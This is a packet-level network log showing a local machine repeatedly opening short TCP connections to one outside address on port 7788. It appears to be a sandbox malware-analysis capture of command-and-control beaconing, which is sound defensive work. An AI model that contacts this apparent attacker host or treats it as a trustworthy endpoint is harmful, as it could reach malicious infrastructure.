Jul 2, 2024 18:17:34.119856119 CEST	44556	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:34.129101038 CEST	44556	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:34.133910894 CEST	7788	44556	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:35.797480106 CEST	7788	44556	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:35.799660921 CEST	44556	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:35.799824953 CEST	44556	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:35.804572105 CEST	7788	44556	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:35.814275980 CEST	44558	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:35.819072008 CEST	7788	44558	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:35.819154978 CEST	44558	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:35.833734035 CEST	44558	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:35.838742971 CEST	7788	44558	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:37.422137022 CEST	7788	44558	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:37.423561096 CEST	44558	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:37.424120903 CEST	44558	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:37.429430008 CEST	7788	44558	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:37.440123081 CEST	44560	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:37.445760012 CEST	7788	44560	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:37.445846081 CEST	44560	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:37.461137056 CEST	44560	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:37.466901064 CEST	7788	44560	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:39.048124075 CEST	7788	44560	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:39.050132036 CEST	44560	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:39.055267096 CEST	7788	44560	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:39.067342997 CEST	44562	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:39.072191000 CEST	7788	44562	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:39.072280884 CEST	44562	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:39.077330112 CEST	44562	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:39.082285881 CEST	7788	44562	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:40.667193890 CEST	7788	44562	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:40.667464018 CEST	44562	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:40.669178963 CEST	44562	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:40.674040079 CEST	7788	44562	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:40.684982061 CEST	44564	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:40.689873934 CEST	7788	44564	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:40.689956903 CEST	44564	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:40.702562094 CEST	44564	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:40.707489967 CEST	7788	44564	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:42.276468039 CEST	7788	44564	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:42.278434992 CEST	44564	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:42.283315897 CEST	7788	44564	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:42.295392036 CEST	44566	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:42.300307989 CEST	7788	44566	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:42.300368071 CEST	44566	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:42.313242912 CEST	44566	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:42.318151951 CEST	7788	44566	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:44.337517023 CEST	7788	44566	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:44.337615013 CEST	7788	44566	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:44.337652922 CEST	7788	44566	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:44.337837934 CEST	44566	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:44.337877035 CEST	44566	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:44.339133024 CEST	44566	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:44.547416925 CEST	44566	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:44.586637020 CEST	7788	44566	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:44.586694002 CEST	7788	44566	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:44.586884022 CEST	44566	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:44.591322899 CEST	44568	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:44.596316099 CEST	7788	44568	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:44.596390009 CEST	44568	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:44.611571074 CEST	44568	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:44.616676092 CEST	7788	44568	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:46.229065895 CEST	7788	44568	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:46.230735064 CEST	44568	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:46.235589027 CEST	7788	44568	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:46.244745970 CEST	44570	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:46.249691010 CEST	7788	44570	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:46.249748945 CEST	44570	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:46.254868984 CEST	44570	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:46.259691000 CEST	7788	44570	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:47.857549906 CEST	7788	44570	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:47.859174967 CEST	44570	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:47.859517097 CEST	44570	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:47.864408970 CEST	7788	44570	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:47.874965906 CEST	44572	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:47.879827023 CEST	7788	44572	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:47.879897118 CEST	44572	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:47.885822058 CEST	44572	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:47.890610933 CEST	7788	44572	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:49.530317068 CEST	7788	44572	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:49.531105995 CEST	44572	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:49.532644033 CEST	44572	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:49.537489891 CEST	7788	44572	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:49.551572084 CEST	44574	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:49.556644917 CEST	7788	44574	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:49.556700945 CEST	44574	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:49.562201977 CEST	44574	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:49.576117992 CEST	7788	44574	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:51.153292894 CEST	7788	44574	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:51.155016899 CEST	44574	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:51.155136108 CEST	44574	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:51.159923077 CEST	7788	44574	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:51.169768095 CEST	44576	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:51.174654961 CEST	7788	44576	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:51.174722910 CEST	44576	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:51.180562019 CEST	44576	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:51.185805082 CEST	7788	44576	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:52.760685921 CEST	7788	44576	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:52.762454987 CEST	44576	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:52.767412901 CEST	7788	44576	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:52.776094913 CEST	44578	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:52.781099081 CEST	7788	44578	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:52.781171083 CEST	44578	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:52.787331104 CEST	44578	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:52.792546988 CEST	7788	44578	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:54.391398907 CEST	7788	44578	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:54.400176048 CEST	44578	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:54.404993057 CEST	7788	44578	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:54.416488886 CEST	44580	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:54.421330929 CEST	7788	44580	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:54.421406031 CEST	44580	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:54.431751966 CEST	44580	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:54.436554909 CEST	7788	44580	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:56.010596991 CEST	7788	44580	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:56.010883093 CEST	44580	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:56.012873888 CEST	44580	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:56.019937038 CEST	7788	44580	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:56.034919977 CEST	44582	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:56.044310093 CEST	7788	44582	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:56.044369936 CEST	44582	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:56.061785936 CEST	44582	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:56.066845894 CEST	7788	44582	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:57.640510082 CEST	7788	44582	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:57.642757893 CEST	44582	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:57.642916918 CEST	44582	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:57.647701979 CEST	7788	44582	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:57.664822102 CEST	44584	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:57.669647932 CEST	7788	44584	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:57.669712067 CEST	44584	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:57.681663036 CEST	44584	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:57.686741114 CEST	7788	44584	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:59.291838884 CEST	7788	44584	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:59.294130087 CEST	44584	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:59.299874067 CEST	7788	44584	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:59.311465979 CEST	44586	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:59.317590952 CEST	7788	44586	209.141.53.247	192.168.2.14
Jul 2, 2024 18:17:59.317693949 CEST	44586	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:59.331940889 CEST	44586	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:17:59.336770058 CEST	7788	44586	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:00.921303034 CEST	7788	44586	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:00.922607899 CEST	44586	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:00.923438072 CEST	44586	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:00.928174973 CEST	7788	44586	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:00.938678026 CEST	44588	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:00.943835020 CEST	7788	44588	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:00.943913937 CEST	44588	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:00.949750900 CEST	44588	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:00.954694986 CEST	7788	44588	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:02.544090033 CEST	7788	44588	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:02.546535015 CEST	44588	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:02.551398039 CEST	44588	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:02.558247089 CEST	7788	44588	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:02.604043961 CEST	44590	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:02.608910084 CEST	7788	44590	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:02.608954906 CEST	44590	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:02.618230104 CEST	44590	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:02.623141050 CEST	7788	44590	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:04.198483944 CEST	7788	44590	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:04.200447083 CEST	44590	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:04.205275059 CEST	7788	44590	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:04.216852903 CEST	44592	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:04.221703053 CEST	7788	44592	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:04.223963022 CEST	44592	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:04.230310917 CEST	44592	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:04.235147953 CEST	7788	44592	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:05.826989889 CEST	7788	44592	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:05.829158068 CEST	44592	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:05.834084988 CEST	7788	44592	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:05.842998028 CEST	44594	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:05.847877026 CEST	7788	44594	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:05.847951889 CEST	44594	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:05.856786013 CEST	44594	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:05.864010096 CEST	7788	44594	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:07.452361107 CEST	7788	44594	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:07.453789949 CEST	44594	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:07.458626032 CEST	7788	44594	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:07.467528105 CEST	44596	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:07.472342968 CEST	7788	44596	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:07.472419024 CEST	44596	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:07.480088949 CEST	44596	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:07.484946966 CEST	7788	44596	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:09.075828075 CEST	7788	44596	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:09.077095985 CEST	44596	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:09.081880093 CEST	7788	44596	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:09.089095116 CEST	44598	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:09.095056057 CEST	7788	44598	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:09.095103979 CEST	44598	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:09.101140022 CEST	44598	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:09.105993986 CEST	7788	44598	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:10.701364040 CEST	7788	44598	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:10.702220917 CEST	44598	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:10.702913046 CEST	44598	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:10.707612991 CEST	7788	44598	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:10.715862989 CEST	44600	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:10.959300041 CEST	7788	44600	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:10.959476948 CEST	44600	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:10.968522072 CEST	44600	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:10.973364115 CEST	7788	44600	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:12.560247898 CEST	7788	44600	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:12.561620951 CEST	44600	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:12.566473961 CEST	7788	44600	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:12.583962917 CEST	44602	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:12.588855982 CEST	7788	44602	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:12.588908911 CEST	44602	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:12.594831944 CEST	44602	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:12.599550962 CEST	7788	44602	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:14.183482885 CEST	7788	44602	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:14.184981108 CEST	44602	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:14.189876080 CEST	7788	44602	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:14.200012922 CEST	44604	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:14.204864979 CEST	7788	44604	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:14.204920053 CEST	44604	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:14.210200071 CEST	44604	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:14.215594053 CEST	7788	44604	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:15.787470102 CEST	7788	44604	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:15.789608002 CEST	44604	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:15.795512915 CEST	7788	44604	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:15.806716919 CEST	44606	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:15.812521935 CEST	7788	44606	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:15.812571049 CEST	44606	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:15.822114944 CEST	44606	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:15.828404903 CEST	7788	44606	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:17.421200991 CEST	7788	44606	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:17.421973944 CEST	44606	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:17.423713923 CEST	44606	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:17.428549051 CEST	7788	44606	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:17.443314075 CEST	44608	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:17.448059082 CEST	7788	44608	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:17.448131084 CEST	44608	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:17.461606026 CEST	44608	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:17.466401100 CEST	7788	44608	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:19.105182886 CEST	7788	44608	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:19.105875969 CEST	44608	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:19.107023001 CEST	44608	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:19.112034082 CEST	7788	44608	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:19.120485067 CEST	44610	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:19.125281096 CEST	7788	44610	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:19.125334024 CEST	44610	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:19.130734921 CEST	44610	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:19.135695934 CEST	7788	44610	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:20.731915951 CEST	7788	44610	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:20.733196020 CEST	44610	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:20.737998962 CEST	7788	44610	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:20.749209881 CEST	44612	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:20.754051924 CEST	7788	44612	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:20.754122019 CEST	44612	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:20.760298967 CEST	44612	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:20.766035080 CEST	7788	44612	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:22.340922117 CEST	7788	44612	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:22.341764927 CEST	44612	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:22.343274117 CEST	44612	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:22.349718094 CEST	7788	44612	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:22.365068913 CEST	44614	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:22.371519089 CEST	7788	44614	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:22.371586084 CEST	44614	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:22.379220963 CEST	44614	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:22.385796070 CEST	7788	44614	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:23.966334105 CEST	7788	44614	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:23.967675924 CEST	44614	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:23.972487926 CEST	7788	44614	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:23.983124018 CEST	44616	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:23.987952948 CEST	7788	44616	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:23.988003016 CEST	44616	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:23.997699976 CEST	44616	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:24.002736092 CEST	7788	44616	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:25.576488018 CEST	7788	44616	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:25.577610970 CEST	44616	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:25.578095913 CEST	44616	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:25.585494995 CEST	7788	44616	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:25.593132019 CEST	44618	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:25.598242044 CEST	7788	44618	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:25.598299026 CEST	44618	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:25.604299068 CEST	44618	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:25.612323999 CEST	7788	44618	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:27.496238947 CEST	7788	44618	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:27.497003078 CEST	7788	44618	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:27.497045994 CEST	44618	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:27.497580051 CEST	44618	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:27.502419949 CEST	7788	44618	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:27.510359049 CEST	44620	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:27.515161991 CEST	7788	44620	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:27.515213966 CEST	44620	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:27.521425962 CEST	44620	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:27.526216984 CEST	7788	44620	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:29.125143051 CEST	7788	44620	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:29.125493050 CEST	44620	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:29.127001047 CEST	44620	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:29.131730080 CEST	7788	44620	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:29.139815092 CEST	44622	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:29.144635916 CEST	7788	44622	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:29.144716978 CEST	44622	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:29.158504963 CEST	44622	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:29.163398027 CEST	7788	44622	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:30.766988993 CEST	7788	44622	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:30.768515110 CEST	44622	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:30.773458958 CEST	7788	44622	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:30.782058001 CEST	44624	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:30.787024021 CEST	7788	44624	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:30.787081003 CEST	44624	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:30.793531895 CEST	44624	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:30.798381090 CEST	7788	44624	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:32.404107094 CEST	7788	44624	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:32.405335903 CEST	44624	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:32.405992985 CEST	44624	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:32.410787106 CEST	7788	44624	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:32.419343948 CEST	44626	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:32.424169064 CEST	7788	44626	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:32.424226046 CEST	44626	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:32.431108952 CEST	44626	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:32.435971022 CEST	7788	44626	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:34.013545036 CEST	7788	44626	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:34.015377998 CEST	44626	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:34.020313978 CEST	7788	44626	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:34.028594017 CEST	44628	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:34.033411026 CEST	7788	44628	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:34.033480883 CEST	44628	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:34.045490026 CEST	44628	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:34.051984072 CEST	7788	44628	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:35.621121883 CEST	7788	44628	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:35.623243093 CEST	44628	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:35.628371954 CEST	7788	44628	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:35.635654926 CEST	44630	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:35.640564919 CEST	7788	44630	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:35.640620947 CEST	44630	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:35.646598101 CEST	44630	7788	192.168.2.14	209.141.53.247
Jul 2, 2024 18:18:35.651417971 CEST	7788	44630	209.141.53.247	192.168.2.14
Jul 2, 2024 18:18:37.254965067 CEST	7788	44630	209.141.53.247	192.168.2.14
